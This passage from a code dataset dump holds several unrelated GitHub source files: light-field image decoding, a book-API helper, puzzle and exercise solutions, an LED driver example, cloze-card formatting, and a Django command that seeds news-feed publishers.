n_jobs=multithreading)\\\n (joblib.delayed(self._decode_cluster_parallel)(interp, x)\n for x in range(-self._microlensRadius,\n self._microlensRadius + 1))\n\n # copy clusters to LF data\n for i in range(0, len(img_clusters[0])):\n lf_data[i, :, :, :, :] = img_clusters[i]\n\n # delete clusters\n del img_clusters\n\n # Create LightField object from data\n decoded = lf.LightField(lf_data)\n del lf_data\n\n # Add decoded image to _decodedImages dictionary\n self._add_decoded_image(decoded, num)\n logger.info(\"...done.\")\n return\n\n @staticmethod\n def _calc_interp_image(img: ndarray) -> ndarray:\n \"\"\"Calculate an interpolation of the raw sensor image using the\n microlens center's Delaunay triangulation.\n\n Args:\n img: Input image to interpolate\n\n Returns:\n Array of :class:`scipy.interpolate.RectBivariateSpline`\n Inteprolation object of the scipy package.\n\n \"\"\"\n logger.info(\"Calculating interpolation object...\")\n\n raw_img = img.copy()\n num_x, num_y, num_ch = raw_img.shape\n\n data_points_x = range(0, num_x)\n data_points_y = range(0, num_y)\n\n # Create empty array of interpolated images\n interp_image = []\n for i in range(0, num_ch):\n interp_image.append(None)\n interp_image = np.array(interp_image)\n\n # Interpolate all color channels independently\n for i in range(0, num_ch):\n data = raw_img[:, :, i]\n\n # Save interpolation as array\n interp_image[i] = interpolate.RectBivariateSpline(\n data_points_x,\n data_points_y,\n data)\n del data\n\n logger.info(\"...done.\")\n del raw_img\n return interp_image\n\n def _calc_subaperture(self,\n interp: ndarray,\n x: int,\n y: int,\n method: str = 'cubic') -> ndarray:\n \"\"\"Calculate a subaperture view from the raw sensor data.\n\n Args:\n interp : ndarray of :class:`scipy.interpolate.RectBivariateSpline`\n\n x: Distance from the microlens center in x-direction in pixels.\n\n y: Distance from the microlens center in y-direction in pixels.\n\n method: Used interpolation method. Available methods are:\n 'bilinear', 'cubic'. Default: 'cubic'.\n\n Returns:\n The calculated subaperture image.\n \"\"\"\n\n interp_param_list = [\"cubic\", \"linear\"]\n\n num_channels = interp.size\n\n if method not in interp_param_list:\n raise ValueError(\n f\"Specified method '{method}' is not one of the \"\n \"recognized methods: {interp_param_list}\")\n\n logger.debug(\n \"Calculating subaperture with x = {} and y = {}...\".format(x, y))\n\n # Calculate interpolation coordinates by given distance x and y\n interp_coordinates = np.asarray(self._microlensCenters)\n interp_coordinates_x = interp_coordinates[:, 0] + x\n interp_coordinates_y = interp_coordinates[:, 1] + y\n\n # Do a Delaunay triangulation of the interpolation points\n logger.debug(\"Calculating Delaunay triangulation of \"\n \"subaperture interpolation points....\")\n triang = mtri.Triangulation(interp_coordinates_x, interp_coordinates_y)\n logger.debug(\"...done.\")\n\n # Get size of the original image from interp object\n x_max = int(interp[0].tck[0].max() + 1)\n y_max = int(interp[0].tck[1].max() + 1)\n\n # Size of subaperture image\n s_max = int(x_max/self._microlensSize)\n t_max = int(y_max/self._microlensSize)\n\n # Rectangular grid for final image\n xi, yi = np.meshgrid(\n np.linspace(0, x_max, s_max),\n np.linspace(0, y_max, t_max))\n\n # Initialize final image\n subaperture_image = np.zeros((s_max, t_max, num_channels),\n dtype=np.float64)\n\n # Check if (x,y) coordinates are still inside microlens,\n # if not, return black image\n # if x**2 + y**2 > self._microlensRadius**2:\n # return subaperture_image\n\n # Iterate over image channels and fill final image\n for i in range(0, num_channels):\n logger.debug(\"Interpolating subaperture image channel {}.\".format(\n i))\n\n # Do a cubic interpolation on the triangular grid\n if method == \"cubic\":\n interp_geom = mtri.CubicTriInterpolator(\n triang,\n interp[i].ev(interp_coordinates_x,\n interp_coordinates_y),\n kind='geom')\n\n # Alternatively, do a linear interpolation\n elif method == \"linear\":\n interp_geom = mtri.LinearTriInterpolator(\n triang,\n interp[i].ev(interp_coordinates_x,\n interp_coordinates_y))\n\n subaperture_image[:, :, i] = np.flipud(np.rot90(\n interp_geom(xi, yi)))\n\n logger.debug(\"...done.\")\n del interp_geom\n logger.debug(\"...done.\")\n return np.squeeze(np.nan_to_num(subaperture_image))\n\n def _decode_cluster_parallel(self,\n interp: ndarray,\n x: int) -> ndarray:\n \"\"\"Decode a cluster of subaperture views.\n\n Args:\n interp: Array of RectBivariateSpline interpolation objects\n to calculate the subaperture view.\n\n x: Coordinate of the cluster in pixels. Here, x specifies the\n distance from the microlens centers in x-direction.\n\n Returns:\n The subaperture views of the cluster.\n\n \"\"\"\n gc.collect()\n\n # Get size of the original image from interp object\n x_max = int(interp[0].tck[0].max() + 1)\n y_max = int(interp[0].tck[1].max() + 1)\n\n u_max = self._microlensSize\n v_max = self._microlensSize\n\n s_max = int(x_max / self._microlensSize)\n t_max = int(y_max / self._microlensSize)\n\n num_channels = interp.size\n\n logger.info(\"Calculating subaperture cluster \"\n f\"#{x + self._microlensRadius + 1} of {u_max}...\")\n\n # calculate one raw (u=const) of subaperture views\n res = np.zeros((v_max, s_max, t_max, num_channels))\n for y in range(-self._microlensRadius, self._microlensRadius + 1):\n img = self._calc_subaperture(\n interp=interp, x=x, y=y, method=\"linear\")\n\n res[y + self._microlensRadius,\n :, :\n :] = images.get_standard_shape(img)\n gc.collect()\n del img\n\n logger.info(f\"...done #{x + self._microlensRadius + 1} of {u_max}.\")\n\n del interp\n return res\n\n def _get_wi_db_entry(self, path: str, metadata: Dict) -> Optional[ndarray]:\n \"\"\"Get a entry for the white image database.\n\n For the generic camera, no metadata is available.\n\n Returns:\n None\n\n \"\"\"\n\n return None\n","repo_name":"themathgeek13/plenpy","sub_path":"plenpy/cameras/generic_lightfield_camera.py","file_name":"generic_lightfield_camera.py","file_ext":"py","file_size_in_byte":14796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"25524451431","text":"from app import app\nimport urllib.request,json\nfrom .models import book\n\nBook= book.Book\n\n#getting api key\n\nkey=app.config['BOOK_API_KEY']\nbase_url=app.config['BOOK_API_BASE_URL']\n\n\ndef get_books(gifted):\n '''\n Funstion that gets the json to our url request\n '''\n get_books_url=base_url.format(volumes,key)\n with urllib.request.urlopen(get_books_url) as url:\n get_books_data=url.read()\n get_books_response=json.loads(get_books_data)\n book_results=None\n \n if get_books_response['items']:\n book_results_list=get_books_response['items']\n book_results=process_results(book_results_list)\n \n \n return book_results\n\n\n\ndef process_results(book_results):\n \n bookList=[]\n bookDict={}\n for result in book_results:\n volumeInfo=result['volumeInfo']\n bookDict['title']=volumeInfo['title']\n if 'imageLinks' in volumeInfo:\n bookDict['image'] = volumeInfo['imageLinks']['thumbnail'] \n bookDict['pageCount'] = volumeInfo.get('pageCount', 'not available') \n bookDict['previewLink'] = volumeInfo.get('previewLink', 'not available')\n \n if 'authors' in result['volumeInfo']:\n bookDict['authors'] = \", \".join(volumeInfo['authors'])\n else:\n bookDict['authors'] = 'Unknown'\n \n if 'publishedDate' in volumeInfo:\n bookDict['publishedDate'] = volumeInfo['publishedDate'][:4]\n else:\n bookDict['publishedDate'] = 'missing'\n \n if 'description' in volumeInfo:\n description = volumeInfo['description'][:700] \n if len(volumeInfo['description']) <= 700:\n bookDict['description'] = description\n else:\n bookDict['description'] = description + \" '...'\" \n else:\n \n bookDict['description'] = \"No description available\" \n \n \n bookList.append(bookDict)\n \n \n # bookDict = {} \n # extractDict['bookList'] = sortByPublishedDate(bookList)\n \n # extractDict['displayCount'] = len(bookList)\n print(bookList)\n \n return bookList\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n","repo_name":"PatrickNgare/BookApi","sub_path":"app/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3493383571","text":"def load_input(source=\"input.txt\"):\n with open(source, 'r') as file:\n data = [[y for y in x.strip().split(\" = \")] for x in file.readlines()]\n for x in range(len(data)):\n if data[x][0][:3] == \"mem\":\n data[x][0] = int(data[x][0][4:-1])\n data[x][1] = int(data[x][1])\n else:\n data[x] = data[x][1]\n return data\n\ndef binify(num):\n return bin(num)[2:].zfill(36)\n\ndef intify(bin_str):\n return int(bin_str, 2)\n\ndef apply_mask(bin_str, mask):\n result = []\n for x in range(len(mask)):\n if mask[x] != \"X\":\n result.append(mask[x])\n else:\n result.append(bin_str[x])\n return \"\".join(result)\n\ndef first_star(data):\n mem = {}\n mask = None\n for cmd in data:\n if type(cmd) == str:\n mask = cmd\n else:\n mem[cmd[0]] = intify(apply_mask(binify(cmd[1]), mask))\n return sum(mem.values())\n\ndef get_combinations(num):\n nums = []\n for i in range(0, 2**num):\n b = bin(i)[2:]\n nums.append(str(b).zfill(num))\n return nums\n \ndef get_mem_variations(mask, address):\n result = []\n # put the nums in\n for x in range(len(mask)):\n if mask[x] != \"X\":\n if mask[x] == \"1\":\n result.append(\"1\")\n else:\n result.append(address[x])\n else:\n result.append(address[x])\n \n result = \"\".join(result)\n print(address)\n print(mask)\n print(result)\n # Get the possible x options\n x = get_combinations(mask.count(\"X\"))\n results = []\n \n # for possible variation set\n for vari in x:\n index = 0\n temp = []\n for l in mask:\n if l == \"X\":\n temp.append(vari[index])\n index += 1\n else:\n temp.append(l)\n temp = \"\".join(temp)\n results.append(temp)\n \n return results\n\ndef second_star(data):\n mem = {}\n mask = None\n for cmd in data:\n if type(cmd) == str:\n mask = cmd\n else:\n addresses = get_mem_variations(mask, binify(cmd[0]))\n for x in addresses:\n mem[intify(x)] = cmd[1]\n print(mem)\n \ndef solution(source):\n data = load_input(source)\n print(\"Day 14\")\n print(\"First star:\", str(first_star(data.copy())))\n print(\"Second star:\", str(second_star(data.copy())))\n print(\"-------------------------------------\")\n\nif __name__ == \"__main__\":\n solution(\"input.txt\")\n","repo_name":"Peritract/adventofcode","sub_path":"2020/day_14.py","file_name":"day_14.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41452339412","text":"# Example using PIO to drive a set of WS2812 LEDs.\n\nimport array\nimport time\n\nimport rp2\nfrom machine import Pin\n\n# -----------------------------------------------\n# add type hints for the rp2.PIO Instructions\nfrom typing_extensions import TYPE_CHECKING # type: ignore\n\nif TYPE_CHECKING:\n from rp2.asm_pio import *\n# -----------------------------------------------\n# Configure the number of WS2812 LEDs.\nNUM_LEDS = 8\n\n\n@rp2.asm_pio(sideset_init=rp2.PIO.OUT_LOW, out_shiftdir=rp2.PIO.SHIFT_LEFT, autopull=True, pull_thresh=24)\ndef ws2812():\n T1 = 2\n T2 = 5\n T3 = 3\n wrap_target()\n label(\"bitloop\")\n out(x, 1) .side(0) [T3 - 1]\n jmp(not_x, \"do_zero\") .side(1) [T1 - 1]\n jmp(\"bitloop\") .side(1) [T2 - 1]\n label(\"do_zero\")\n nop() .side(0) [T2 - 1]\n wrap()\n\n\n# Create the StateMachine with the ws2812 program, outputting on Pin(22).\nsm = rp2.StateMachine(0, ws2812, freq=8_000_000, sideset_base=Pin(22))\n\n# Start the StateMachine, it will wait for data on its FIFO.\nsm.active(1)\n\n# Display a pattern on the LEDs via an array of LED RGB values.\nar = array.array(\"I\", [0 for _ in range(NUM_LEDS)])\n\n# Cycle colours.\nfor i in range(4 * NUM_LEDS):\n for j in range(NUM_LEDS):\n r = j * 100 // (NUM_LEDS - 1)\n b = 100 - j * 100 // (NUM_LEDS - 1)\n if j != i % NUM_LEDS:\n r >>= 3\n b >>= 3\n ar[j] = r << 16 | b # type: ignore \n sm.put(ar, 8)\n time.sleep_ms(50)\n\n# Fade out.\nfor i in range(24):\n for j in range(NUM_LEDS):\n ar[j] >>= 1 # type: ignore \n sm.put(ar, 8)\n time.sleep_ms(50)\n","repo_name":"Josverl/PIO_ASM_typing","sub_path":"src/pio/pio_ws2812.py","file_name":"pio_ws2812.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"40334413138","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 22 16:55:57 2022\n\n@author: rene.degen@inodes.ch\n\nAufgabe:\nDie Datei \"BEV370OD3700.csv\" enthält \"Alle nach Geschlecht und Geburtsjahr\naggregierten Vornamen von Neugeborenen mit Wohnsitz in der Stadt Zürich seit 1993.\"\"\n\nGeben Sie die 10 häufigsten Vornamen des Jahres 2020 aus\n\nHier wird das Modul csv und das Collection Modul verwendet\n\n\"\"\"\n\nimport collections\nimport csv\n\nquelle='BEV370OD3700.csv'\nlimite = 10\nauswahljahr = '2020'\n\nanzahl_namen = collections.Counter()\n\nwith open(quelle, newline='',encoding='utf-8-sig') as csvdatei:\n reader = csv.DictReader(csvdatei)\n for eintrag in filter(lambda x: auswahljahr==None or auswahljahr == x['StichtagDatJahr'], \\\n reader):\n name = eintrag['Vorname']\n anzahl = int(eintrag['AnzGebuWir'])\n anzahl_namen[name] += anzahl\n \nfor n in anzahl_namen.most_common(limite):\n print(*n)","repo_name":"wunnox/python_advanced","sub_path":"Musterloesungen/vornamencsvcoll.py","file_name":"vornamencsvcoll.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6123547206","text":"import re\nfrom наки import tsv\nfrom collections import namedtuple\n\n\nИзвор = namedtuple('Извор', ['ид', 'датум', 'цлозе'])\n\n\nЦЛОЗЕ_ПРОГ = re.compile('[{][^:]*:[^}]*[}]')\nЦЛОЗЕ_ПИТАЊЕ = re.compile('[{]([^:]*):[^}]*[}]')\nЦЛОЗЕ_ОДГОВОР = re.compile('[{][^:]*:([^}]*)[}]')\n\n\nclass ЦлозеГрешка(ValueError):\n pass\n\n\ndef формат_уклони_болд(текст):\n текст = текст.replace('[[', 'ДУПЛЕ_КОЦКАСТЕ_ЛЕВЕ').replace(']]', 'ДУПЛЕ_КОЦКАСТЕ_ДЕСНЕ')\n текст = текст.replace('[', '').replace(']', '')\n те��ст = текст.replace('ДУПЛЕ_КОЦКАСТЕ_ЛЕВЕ', '[[').replace('ДУПЛЕ_КОЦКАСТЕ_ДЕСНЕ', ']]')\n return текст\n\n\ndef формат_цлозе_питање(текст):\n променљиве = ЦЛОЗЕ_ПРОГ.findall(текст)\n if not променљиве:\n raise ЦлозеГрешка(f'Текст нема Цлозе променљивих: {текст}')\n питања = ['{{{' + ЦЛОЗЕ_ПИТАЊЕ.match(п).group(1) + '}}}' for п in променљиве]\n формат = ЦЛОЗЕ_ПРОГ.subn('{}', текст)[0]\n текст = формат.format(*питања)\n текст = формат_уклони_болд(текст)\n return текст\n\n\ndef формат_цлозе_одговор(текст):\n променљиве = ЦЛОЗЕ_ПРОГ.findall(текст)\n if not променљиве:\n raise ЦлозеГрешка(f'Текст нема Цлозе променљивих: {текст}')\n одговори = ['{' + ЦЛОЗЕ_ОДГОВОР.match(п).group(1) + '}' for п in променљиве]\n формат = ЦЛОЗЕ_ПРОГ.subn('{}', текст)[0]\n текст = формат.format(*одговори)\n текст = текст.replace('{} ', '').replace('{}', '')\n return текст\n\n\ndef извор_одради(кг):\n карте = []\n\n # 0\n def питање(џ):\n return формат_цлозе_питање(џ.цлозе)\n\n def одговор(џ):\n return формат_цлозе_одговор(џ.цлозе)\n\n карте.extend(кг(\"ЦЛОЗЕ\", питање, одговор))\n return карте, []\n\n\ndef извор_учитај(путања):\n return tsv.Табела(путања, tsv.namedtuple(Извор)).учитај()\n\n","repo_name":"cohadar/naki","sub_path":"код/каталог/извори/de_cloze.py","file_name":"de_cloze.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24850918401","text":"\"\"\"\n给你一个points数组,表示 2D 平面上的一些点,其中points[i] = [xi, yi]。\n连接点[xi, yi] 和点[xj, yj]的费用为它们之间的 曼哈顿距离:|xi - xj| + |yi - yj|,其中|val|表示val的绝对值。\n请你返回将所有点连接的最小总费用。只有任意两点之间 有且仅有一条简单路径时,才认为所有点都已连接。\n\n示例 1:\n输入:points = [[0,0],[2,2],[3,10],[5,2],[7,0]]\n输出:20\n解释:\n\n我们可以按照上图所示连接所有点得到最小总费用,总费用为 20 。\n注意到任意两个点之间只有唯一一条路径互相到达。\n\n示例 2:\n输入:points = [[3,12],[-2,5],[-4,1]]\n输出:18\n\n示例 3:\n输入:points = [[0,0],[1,1],[1,0],[-1,1]]\n输出:4\n\n示例 4:\n输入:points = [[-1000000,-1000000],[1000000,1000000]]\n输出:4000000\n\n示例 5:\n输入:points = [[0,0]]\n输出:0\n\n提示:\n\n1 <= points.length <= 1000\n-106<= xi, yi <= 106\n所有点(xi, yi)两两不同。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/min-cost-to-connect-all-points\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nfrom typing import List\n\n\nclass UnionSet:\n def __init__(self, n):\n self.n = n\n self.rank = [1] * n\n self.f = [i for i in range(n)]\n\n def find(self, x):\n if self.f[x] == x:\n return x\n self.f[x] = self.find(self.f[x])\n return self.f[x]\n\n def union(self, x, y):\n root_x = self.find(x)\n root_y = self.find(y)\n if root_x == root_y:\n return False\n\n if self.rank[root_x] < self.rank[root_y]:\n root_x, root_y = root_y, root_x\n\n self.rank[root_x] += self.rank[root_y]\n self.f[root_y] = root_x\n return True\n\n\nclass Solution:\n def minCostConnectPoints(self, points: List[List[int]]) -> int:\n \"\"\"\n 根据题意,我们得到了一张 n 个节点的完全图,任意两点之间的距离均为它们的曼哈顿距离。\n 现在我们需要在这个图中取得一个子图,恰满足子图的任意两点之间有且仅有一条简单路径,\n 且这个子图的所有边的总权值之和尽可能小。\n\n 能够满足任意两点之间有且仅有一条简单路径只有树,且这棵树包含 n 个节点。\n 我们称这棵树为给定的图的生成树,其中总权值最小的生成树,我们称其为最小生成树。\n\n 最小生成树有一个非常经典的解法:Kruskal。\n\n 方法一:Kruskal 算法\n 思路及解法\n Kruskal 算法是一种常见并且好写的最小生成树算法,由Kruskal 发明。\n 该算法的基本思想是从小到大加入边,是一个贪心算法。\n 其算法流程为:\n 将图G={V,E} 中的所有边按照��度由小到大进行排序,等长的边可以按任意顺序。\n 初始化图 G'为{V,∅},从前向后扫描排序后的边,如果扫描到的边 e 在 G'中连接了两个相异的连通块,则将它插入 G'中。\n\n 最后得到的图 G'就是图 G 的最小生成树。\n\n 在实际代码中,我们首先将这张完全图中的边全部提取到边集数组中,\n 然后对所有边进行排序,从小到大进行枚举,每次贪心选边加入答案。\n 使用并查集维护连通性,若当前边两端不连通即可选择这条边。\n\n 作者:LeetCode-Solution\n 链接:https://leetcode-cn.com/problems/min-cost-to-connect-all-points/solution/lian-jie-suo-you-dian-de-zui-xiao-fei-yo-kcx7/\n 来源:力扣(LeetCode)\n 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n \"\"\"\n dist = lambda x, y: abs(points[x][0] - points[y][0]) + abs(points[x][1] - points[y][1])\n\n n = len(points)\n dsu = UnionSet(n)\n edges = list()\n\n for i in range(n):\n for j in range(i + 1, n):\n edges.append((dist(i, j), i, j))\n\n edges.sort()\n\n ret, num = 0, 1\n for length, x, y in edges:\n if dsu.union(x, y):\n ret += length\n num += 1\n if num == n:\n break\n\n return ret\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.minCostConnectPoints([[0, 0], [2, 2], [3, 10], [5, 2], [7, 0]]))\n print(s.minCostConnectPoints([[-1000000, -1000000], [1000000, 1000000]]))\n","repo_name":"wanzhouyi/leetcode","sub_path":"1.数组和字符串/并查集/1584. 连接所有点的最小费用.py","file_name":"1584. 连接所有点的最小费用.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"73401348053","text":"all_steps = 0\r\nsteps_on_way_home = 0\r\ncommand = input()\r\ngoal_reached = False\r\nwhile all_steps < 10000:\r\n if command != 'Going home':\r\n all_steps += int(command)\r\n else:\r\n steps_on_way_home = int(input())\r\n all_steps += steps_on_way_home\r\n break\r\n if all_steps >= 10000:\r\n goal_reached = True\r\n break\r\n command = input()\r\nif all_steps >= 10000:\r\n goal_reached = True\r\ndifference = abs(all_steps - 10000)\r\nif goal_reached:\r\n print(f\"Goal reached! Good job!\")\r\n print(f\"{difference} steps over the goal!\")\r\nelse:\r\n print(f\"{difference} more steps to reach goal.\")","repo_name":"Gattsu1337/Python-Basics","sub_path":"walking.py","file_name":"walking.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26641645953","text":"#! /usr/bin/python\n# -*- encoding: utf-8 -*-\n\n# 递归案例:传入一个参数n,计算1...n的累计求和\n\n\ndef sum_nums(num):\n \"\"\"\n 传入一个参数n,计算1...n的累计求和\n :param num: 传入的参数\n :return: 累计求和的结果\n \"\"\"\n # 递归出口\n if num == 1:\n return 1\n # 递归调用自己实现累计求和\n temp = sum_nums(num - 1)\n return temp + num\n\n\nresult = sum_nums(5)\nprint(\"1..100的和为:%d\" % result)\n","repo_name":"xiaoqiangjava/python_basic","sub_path":"basic/function/recursion_case.py","file_name":"recursion_case.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17649723913","text":"\"\"\"mange.py command add_defaullt_feeds to add default data to database\"\"\"\nfrom django.core.management import BaseCommand\n\nfrom feeds.models import Feed, Publisher\nfrom preferences.models import Page\n\n\nclass Command(BaseCommand):\n \"\"\"command for manage.py\"\"\"\n\n # Show this when the user types help\n help = \"Adds StartUp default feeds\"\n\n def handle(self, *args, **options):\n \"\"\"adds default data to database\"\"\"\n initial_publishers = [\n {\n \"name\": \"Financial Times\",\n \"link\": \"https://www.ft.com\",\n \"renowned\": 3,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Tagesschau\",\n \"link\": \"https://www.tagesschau.de\",\n \"renowned\": 3,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"de\",\n },\n {\n \"name\": \"ZDF Heute\",\n \"link\": \"https://www.heute.de\",\n \"renowned\": 3,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"de\",\n },\n {\n \"name\": \"Redations Netzwerk Deutschland\",\n \"link\": \"https://www.rnd.de\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"de\",\n },\n {\n \"name\": \"FAZ\",\n \"link\": \"https://www.faz.net\",\n \"renowned\": 3,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"guid\",\n \"language\": \"de\",\n },\n {\n \"name\": \"The Economist\",\n \"link\": \"http://www.economist.com\",\n \"renowned\": 3,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Harvard Business Review\",\n \"link\": \"https://hbr.org\",\n \"renowned\": 2,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Wall Street Journal\",\n \"link\": \"https://www.wsj.com/\",\n \"renowned\": 2,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Al Jazeera\",\n \"link\": \"https://www.aljazeera.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"CNBC\",\n \"link\": \"https://www.cnbc.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Risk.net\",\n \"link\": \"https://www.risk.net\",\n \"renowned\": 1,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Hedge Week\",\n \"link\": \"https://www.hedgeweek.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Reuters\",\n \"link\": \"https://www.reuters.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Deutsche Welle\",\n \"link\": \"https://www.dw.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"title\",\n \"language\": \"en\",\n },\n {\n \"name\": \"n-tv.de\",\n \"link\": \"https://www.n-tv.de\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"de\",\n },\n {\n \"name\": \"Bloomberg\",\n \"link\": \"https://www.bloomberg.com\",\n \"renowned\": 2,\n \"paywall\": \"Y\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"BBC\",\n \"link\": \"https://www.bbc.com\",\n \"renowned\": 2,\n \"paywall\": \"N\",\n \"unique_article_id\": \"url\",\n \"language\": \"en\",\n },\n {\n \"name\": \"The Trade\",\n \"link\": \"http://www.thetradenews.com\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"9to5mac.com\",\n \"link\": \"http://www.9to5mac.com\",\n \"renowned\": 2,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"TechCrunch\",\n \"link\": \"https://techcrunch.com\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"The Verge\",\n \"link\": \"http://www.theverge.com\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Medium\",\n \"link\": \"http://www.medium.com\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Google News\",\n \"link\": \"https://news.google.com\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Stuff Made Here\",\n \"link\": \"https://www.youtube.com/@StuffMadeHere\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Teulu Tribe\",\n \"link\": \"https://www.youtube.com/@TeuluTribe\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"BigThink\",\n \"link\": \"https://www.youtube.com/@bigthink\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"EconomicsExplained\",\n \"link\": \"https://www.youtube.com/@EconomicsExplained\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Wendover Productions\",\n \"link\": \"https://www.youtube.com/@Wendoverproductions\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"RealEngineering\",\n \"link\": \"https://www.youtube.com/@RealEngineering\",\n \"renowned\": 0,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"TED\",\n \"link\": \"https://www.ted.com/\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"Vox\",\n \"link\": \"https://www.vox.com/\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n {\n \"name\": \"TheNextWeb\",\n \"link\": \"https://www.thenextweb.com/\",\n \"renowned\": 1,\n \"paywall\": \"N\",\n \"unique_article_id\": \"guid\",\n \"language\": \"en\",\n },\n ]\n\n for publisher in initial_publishers:\n Publisher(**publisher).save()\n\n initial_feeds = [\n ########################### English News ###########################\n {\n \"name\": \"Home International\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/rss/home/international\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage\",\n \"importance\": 4,\n },\n {\n \"name\": \"Markets\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/markets?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"r\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;markets\",\n \"importance\": 1,\n },\n {\n \"name\": \"News In Depth\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/news-in-depth?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;News In Depth\",\n \"importance\": 2,\n },\n {\n \"name\": \"The Big Read\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": \"https://www.ft.com/the-big-read?format=rss\",\n \"active\": True,\n \"feed_ordering\": \"d\",\n \"full_text_fetch\": \"Y\",\n \"source_categories\": \"frontpage;The Big Read\",\n \"importance\": 2,\n },\n {\n \"name\": \"Country US\",\n \"publisher\": Publisher.objects.get(name=\"Financial Times\"),\n \"url\": 